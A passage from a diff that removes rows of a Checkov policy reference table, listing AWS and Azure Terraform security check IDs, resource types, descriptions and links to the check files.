-| 1130 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1131 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1132 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1133 | CKV2_AWS_37 | resource | aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1134 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1135 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1136 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1137 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1138 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1139 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1140 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1141 | CKV2_AWS_37 | resource | aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1142 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1143 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1144 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1145 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
-| 1146 | CKV2_AWS_38 | resource | aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) |
-| 1147 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) |
-| 1148 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
-| 1149 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
-| 1150 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
-| 1151 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) |
-| 1152 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | 
[IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1153 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1154 | CKV2_AWS_41 | resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) | -| 1155 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) | -| 1156 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) | -| 1157 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | -| 1158 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | 
[VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | -| 1159 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | -| 1160 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | -| 1161 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) | -| 1162 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | -| 1163 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | -| 1164 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible 
resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) | -| 1165 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) | -| 1166 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) | -| 1167 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1168 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1169 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1170 | CKV2_AWS_52 | resource | 
aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | -| 1171 | CKV2_AWS_52 | resource | aws_opensearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | -| 1172 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) | -| 1173 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) | -| 1174 | CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) | -| 1175 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. 
| Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1176 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1177 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1178 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1179 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1180 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1181 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. 
| Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1182 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) | -| 1183 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) | -| 1184 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | -| 1185 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | -| 1186 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) | -| 1187 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) | -| 1188 | CKV2_AWS_62 | resource | 
aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) | -| 1189 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) | -| 1190 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) | -| 1191 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) | -| 1192 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) | -| 1193 | CKV_AZURE_1 | resource | azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | -| 1194 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | -| 1195 | CKV_AZURE_2 | resource | 
azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) | -| 1196 | CKV_AZURE_3 | resource | azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) | -| 1197 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) | -| 1198 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) | -| 1199 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) | -| 1200 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) | -| 1201 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) | -| 1202 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet 
| Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | -| 1203 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | -| 1204 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | -| 1205 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | -| 1206 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1207 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1208 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1209 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no 
SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1210 | CKV_AZURE_12 | resource | azurerm_network_watcher_flow_log | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) | -| 1211 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1212 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1213 | CKV_AZURE_13 | resource | azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1214 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1215 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1216 | CKV_AZURE_14 
| resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1217 | CKV_AZURE_15 | resource | azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1218 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1219 | CKV_AZURE_15 | resource | azurerm_windows_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1220 | CKV_AZURE_16 | resource | azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1221 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1222 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1223 | 
CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1224 | CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1225 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1226 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1227 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1228 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1229 | CKV_AZURE_19 | resource | azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | 
